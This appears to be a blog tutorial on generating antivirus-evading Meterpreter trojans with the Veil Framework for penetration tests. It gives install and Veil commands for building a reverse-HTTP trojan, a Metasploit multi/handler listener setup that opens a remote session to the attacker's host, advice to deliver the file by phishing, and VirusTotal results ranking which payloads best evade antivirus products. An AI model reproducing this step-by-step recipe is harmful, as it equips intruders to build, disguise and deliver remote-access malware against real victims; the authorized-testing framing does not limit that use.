Evading Anti-Virus Software with Veil Framework

Introduction

During a penetration testing engagement, there comes a time where it is necessary to install a Trojan on the target’s system. Most often, the Trojan is sent through a phishing email to the target’s employees – as per the agreement during the pre-engagement meetings. The Trojan may be delivered by other means, like USB flash memory, shared folder, etc. Once the user clicks on the Trojan executable file, it connects to the pentester’s system where he is now able to control the target.

Generally, there are different reasons why such social engineering task is conducted by the whitehat hacker – a.k.a., the security consultant; some of them are:

• The whitehat hacker could not find a server-side vulnerability to exploit remotely and have a shell or a controlling session.
• The whitehat hacker wants to gain access to certain systems belonging to key individuals in the target organization. That is, these systems are not servers, but mere workstations.
• The target organization wants to assess the security awareness level of its employees.

Despite the fact that there are so many Remote Access Trojans (RATs) in the wild, the Metasploit Interpreter – i.e., Meterpreter – is very efficient, effective, and powerful in accomplishing such task. Essentially, Meterpreter is a payload that is used while exploiting server-side or client-side vulnerabilities. It is the best and most developed payload among all payloads that Metasploit has in its arsenal. Given that the payload – whether it is Meterpreter or something else – is a bunch of machine instructions, there has to be a way to insert such code into memory and execute it. The payload itself is not a recognizable executable file. When the payload is delivered through an exploit, the exploit – as it is exploiting the vulnerability – will inject the payload into memory. However, in case there are not exploitable vulnerabilities, we cannot use the payload directly as a Trojan.

Luckily for us, the Metasploit’s team developed a way to use the payload as an independent Trojan. And the way is to wrap the payload in a recognizable executable file template – like EXE. In this way, the EXE file can be delivered to any Windows system, get double-clicked on, and then get executed. Once executed, the template will insert the payload in memory and run it. The Metasploit’ tool that generates standalone executable payload is “msfvenom.” It can generate a standalone Meterpreter executable file, which we then deliver to our target.

However, it is not so difficult for Anti-Virus programs to detect such file. The easiest detection method is to have signatures for the actual payload itself, i.e., Meterpreter, and for the executable template. Most AV products have signatures for these two components; and as such, we cannot deliver our Trojan – generated natively by msfvenom – to our target since we risk detection by AV.

The Way of Evasion

In order to evade AV software, two things are needed:

1. The executable template – that is, the EXE file that wraps the payload – needs to be dynamically generated. Instead of having a static template, the template will be unique each time we generate the file. Thus, an AV software cannot have a signature for it.
2. The payload – like Meterpreter – that is wrapped within the template needs to be obfuscated. Each time we generate our executable file, the payload within must be randomized or scrambled. Thus, AV cannot detect the payload.

Did the Metasploit team implement such a way? Actually yes; however, they implemented it in the Professional (paid) version of Metasploit. And in Metasploit Pro, this feature can be enabled either from the web interface or from the command line using the module:

/exploits/pro/windows/dynamic_exe

Now, for those of us who use the open-source free Metasploit Framework, we are not left with no hope. Another platform was developed by a group of security researchers to accomplish the task of evading Anti-Virus, and that platform called “Veil Platform:”

• Website: https://www.veil-framework.com/
• Github: https://github.com/Veil-Framework

Enter the Veil

According to Github’s Veil page,

Veil is a tool designed to generate metasploit payloads that bypass common anti-virus solutions.

It relies on msfvenom to generate Metasploit payloads, then, it performs additional operations to dynamically create executable wrappers – or templates – and to obfuscate the payload so that AV won’t be able to detect it.

When working with Veil, there are three components we need to understand in order in order to generate the final Trojan. These three components are:

1. The Programming Language: Veil first writes a source code in a certain programming language; then, it compiles that code into the final executable. Veil supports multiple languages which we can choose in order to generate our Trojan. The chosen language makes a difference when it comes to AV evasion. We will discuss later how certain languages are more effective in evading certain AVs. The supported languages are:
   1. AutoIt
   2. C
   3. CS (C-Sharp/C#)
   4. GO (Golang)
   5. LUA
   6. Perl
   7. Powershell
   8. Python
   9. Ruby
2. The Payload (Shellcode): this is the code that will be wrapped inside the Trojan. It is what is going to do our work, like giving us a backdoor. Given that there is one payload considered by security professionals – and the Metasploit’s developers – to be the best and most powerful payload, and that is Meterpreter, Veil has got this Payload the default payload. Veil gives you the opportunity to choose another payload of your liking.
3. The Obfuscation Method: this is how Veil is going to hide the payload inside the Trojan. There are situations where there is no need for obfuscation to be done – as in the case of choosing Meterpreter stager (e.g., Reverse TCP, Reverse HTTP, Reverse HTTPS, etc.). The following are some of the methods implemented by Veil:
   1. Base64
   2. AES Encryption
   3. ARC4 Encryption
   4. DES Encryption
   5. Letter Substitution

Installing Veil Framework

Let’s move now to the practical side and see how we can generate those Trojans that ultimately will evade AV software. To start, you need to install the Veil Framework on your Debian or Kali Linux. The Veil Framework is available at Github:

https://github.com/Veil-Framework/Veil

And all you need to download and install it is to type the following commands on your Terminal:

# apt-get -y install git
# git clone https://github.com/Veil-Framework/Veil.git
# cd Veil/
# cd setup
# sudo ./setup.sh -c

Running Veil

Inside the Veil directory, e.g., /root/Veil/, run Veil.py as follows:

# ./Veil.py

You will be prompted with Veil’s main window – shown below:

It is worth mentioning here that the current version of Veil – 3.1.4 – combines two tools that used to be separate; and they are Evasion and Ordnance. Evasion is the tool for generating obfuscated Trojans (executable files), while Ordnance is the tool for generating shellcodes only (no executables). For the sake of this tutorial, we are mainly interested in Evasion. If we type the command list in the command prompt, we will get the following screen:

And all we need to do now is choose the first tool – Evasion – by entering the command:

use 1

And we will get the main window of the Evasion tool:

Understanding Veil’s Payloads

As you can see from the previous image, there are 41 payloads in Veil Evasion. To see what they are, we can type the command list. The following image shows a section of the listed payloads:

Each listed payload has three sections with forward slashes (“/”) separating them. The only exceptions are auxiliary payloads. Auxiliary payloads perform additional helpful functionalities; but they are not used directly to create a Trojan. The following is a description for each section of all other payloads:

1. The first section indicates the programming language the source code will be written in.
2. The second section indicates the actual code (called here shellcode) that will be embedded in the Trojan. If we look carefully, we will see there are only two types here: meterpreter and shellcode_inject. The first one, meterpreter, embeds a certain Meterpreter stager (see number 3) inside the Trojan. The second one, shellcode_inject, will allow you to embed any shellcode of your choice inside the Trojan. You can choose from Metasploit’s collection of shellcodes or insert your own custom shellcode. You can even embed Meterpreter using this type of payloads.
3. The third section depends on the second one. If the second section was meterpreter, then, this section will indicate the type of stager – a stager being the code that delivers Meterpreter in real-time once the Trojan is executed – to embed. If the second section was shellcode_inject, then, this third section will indicate the obfuscation method to be used.

Generating the Trojan

We are going now to generate a Trojan using the payload number 26:

python/meterpreter/rev_http

Type the command use 26. The next screen will show you a description of this payload along with options that can be configured. Most of these options already have default values which we are not going to change now.

The only option we need to set is the LHOST, which is going to be the IP address of our Metasploit system. The Trojan once executed on the victim’s machine will connect back to our Metasploit system so that we remotely control it. To set the LHOST parameter, we type the following command:

set LHOST <metasploit_ip>

After you hit enter, we are now ready to generate the executable Trojan. We type the command:

generate

We’ll be prompted to enter the name of the Trojan – e.g., “mytrojan” – as follows:

When generating a Trojan using any of the Python payloads, you will most likely be prompted to enter the method of converting the Python code to an EXE file; the two available methods are Pyinstaller and Py2Exe. We will choose the first one (which is the default) in our example here. After that, once the EXE file is generated, you will be shown the location of that executable file as well as the source code:

As you can see in the image above, the executable Trojan “mytrojan.exe” was written to the folder /usr/share/veil-output/compiled/.

Launching the Attack

Our job now is to send the Trojan to the victim – using any social engineering methods. However, before that, we need to setup our Metasploit system to listen for incoming connections on port 4444, which is the default LPORT. The listener can be configured within Metasploit console (msfconsole) as follows:

msf > use exploit/multi/handler
msf exploit(handler) > set PAYLOAD windows/meterpreter/reverse_http
msf exploit(handler) > set LHOST <metasploit_ip>
msf exploit(handler) > set LPORT 4444
msf exploit(handler) > set ExitOnSession false
msf exploit(handler) > run -j

Once the victim user runs the Trojan, it will initiate a connection with our Metasploit system from which we can control the victim’s machine.

Anti-Virus Strength Assessment

I have generated two batches (rounds) where each batch contains 35 trojans using 35 of Veil’s payloads. And uploaded them to Virus Total (www.virustotal.com) to see which AV software detects which Trojans. The following are the results of both rounds:

Round 1

Round 2

Veil’s Payloads Assessment

The above experiment revealed that not all payloads have the same effectiveness when it comes to evading AV. The strongest payload that had the highest success rate in evading AV was:

autoit/shellcode_inject/flat

From the 12 AV products listed above, this payload evaded 9 of them.

On the other hand, C payloads have demonstrated a very low success rate; they are the weakest of all payloads. And they are:

c/meterpreter/rev_http
c/meterpreter/rev_http_service
c/meterpreter/rev_tcp
c/meterpreter/rev_tcp_service